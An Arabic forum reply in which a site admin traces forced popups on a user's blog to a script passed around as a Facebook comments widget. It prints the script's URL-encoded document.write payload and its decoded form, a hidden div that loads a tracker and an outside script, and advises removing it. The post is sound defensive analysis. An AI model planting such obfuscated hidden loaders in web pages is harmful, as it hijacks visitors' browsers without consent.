عرض مشاركة واحدة
قديم 08-05-2012, 02:58 AM   #11
admin
مدير عام
 
الصورة الرمزية admin
 
تاريخ التسجيل: Apr 2012
الدولة: جده
المشاركات: 2,846
افتراضي رد: طلب صعب شويه

اقتباس:
المشاركة الأصلية كتبت بواسطة Aero مشاهدة المشاركة
هو مش بيظهر كتير على فكرة بس علشان انا بشتغل كتير عليه وبتظهر النوافذ الأجبارية دى وبلاقى فوق رقم id وده اللى مدايقنى ان حد ياخد مجهودى


فعلا هي موجودة
وأبشر أخي لقد وجدته
وهو مزروع في أحد أكواد تعليقات الفيسبوك ولا حول ولا قوة إلا بالله على الاستغلال
المهم لما بحثت عن كلمة zwaar لم أجد له أثر لذلك فقلت أن الطريقة الوحيدة أن يكون في ملف Java لذلك بحثت عن أكواد الجافا (بحثت عن .js)
ووجدت أن الكود المشكوك فيه هو : http://sites.google.com/site/javacodehtml/fb.js
المهم حملت الملف ووجدته مشفر :
كود PHP:
document.writeunescape'%3C%64%69%76%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%3E%0A%3C%73%63%72%69%70%74%20%69%64%3D%22%5F%77%61%75%68%64%6C%22%3E%76%61%72%20%5F%77%61%75%20%3D%20%5F%77%61%75%20%7C%7C%20%5B%5D%3B%20%5F%77%61%75%2E%70%75%73%68%28%5B%22%73%6D%61%6C%6C%22%2C%20%22%32%6C%72%6F%70%33%6E%64%39%6A%33%68%22%2C%20%22%68%64%6C%22%5D%29%3B%0A%28%66%75%6E%63%74%69%6F%6E%28%29%20%7B%76%61%72%20%73%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%22%73%63%72%69%70%74%22%29%3B%20%73%2E%61%73%79%6E%63%3D%74%72%75%65%3B%0A%73%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%69%64%67%65%74%73%2E%61%6D%75%6E%67%2E%75%73%2F%73%6D%61%6C%6C%2E%6A%73%22%3B%0A%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%22%68%65%61%64%22%29%5B%30%5D%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%29%3B%0A%7D%29%28%29%3B%3C%2F%73%63%72%69%70%74%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%7A%77%61%61%72%2E%6F%72%67%2F%63%6F%64%65%2E%6A%73%3F%69%64%3D%32%36%36%35%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%64%69%76%3E' ) ); 
بعد أن فككت التشفير شوف ماذا وجدت :
كود:
document.write( unescape( '<div style="display:none;">
<script id="_wauhdl">var _wau = _wau || []; _wau.push(["small", "2lrop3nd9j3h", "hdl"]);
(function() {var s=document.createElement("script"); s.async=true;
s.src="http://widgets.amung.us/small.js";
document.getElementsByTagName("head")[0].appendChild(s);
})();</script>
<script type="text/javascript" src="http://zwaar.org/code.js?id=2665"></script>
</div>' ) );

أرى أن الكود لا علاقة له بالفيسبوك أبدا
جرب تحذف الكود التالي ورد علينا خبر:
كود:
<script src='http://sites.google.com/site/javacodehtml/fb.js' type='text/javascript'/>
والمصيبة أن العديد من المدونات تتداول الكود نفسه والطريقة نفسها لتركيب تعليقات الفيسبوك

الدعم العربي

admin غير متواجد حالياً